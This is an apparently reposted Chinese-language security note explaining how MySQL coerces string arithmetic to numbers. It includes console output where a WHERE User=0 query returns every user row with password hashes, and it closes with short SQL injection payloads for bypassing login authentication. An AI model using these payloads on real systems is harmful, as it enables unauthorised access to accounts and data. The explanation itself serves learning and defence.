Abusing MySQL string arithmetic for tiny SQL injections

测试平台:    backtrack r3x86
MYSQL版本：  mysql-5.1.63

mysql> select User,Password from user where User=0;
+------------------+-------------------------------------------+
| User             | Password                                  |
+------------------+-------------------------------------------+
| root             | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 |
| root             | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 |
| root             | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 |
| debian-sys-maint | *8C4C424D182238AFBA8B217F692D07C952EF4087 |
+------------------+-------------------------------------------+
4 rows in set, 4 warnings (0.00 sec)

mysql> select User,Password from user where User='';
Empty set (0.00 sec)

mysql> select User,Password from user where User=NULL;
Empty set (0.01 sec)

mysql> select 'w'-'w';
+---------+
| 'w'-'w' |
+---------+
|       0 |
+---------+
1 row in set, 2 warnings (0.00 sec)

mysql> select "w"-"w";
+---------+
| "w"-"w" |
+---------+
|       0 |
+---------+
1 row in set, 2 warnings (0.01 sec)

光看上面的warnings有人可能不信，特作下面的验证.

mysql> create TEMPORARY TABLE temptbl AS SELECT ('A'-'A') AS coll;
Query OK, 1 row affected, 2 warnings (0.01 sec)
Records: 1  Duplicates: 0  Warnings: 0

mysql> describe temptbl;
+-------+--------+------+-----+---------+-------+
| Field | Type   | Null | Key | Default | Extra |
+-------+--------+------+-----+---------+-------+
| coll  | double | NO   |     | 0       |       |
+-------+--------+------+-----+---------+-------+
1 row in set (0.01 sec)

能完成数值类型转换的表达式均可, 例如: select username,password from users where username= '' +0;

类似的”+0,”-0,”*0,”^0均可。 精简payload可以绕过登录认证： ‘+0#，’/1#，’^0，’-0#等等。

http://www.xaprb.com/blog/2008/08/13/how-to-emulate-the-typeof-function-in-mysql/
http://blog.kotowicz.net/2013/01/abusing-mysql-string-arithmetic-for.html
http://www.freebuf.com/articles/web/6894.html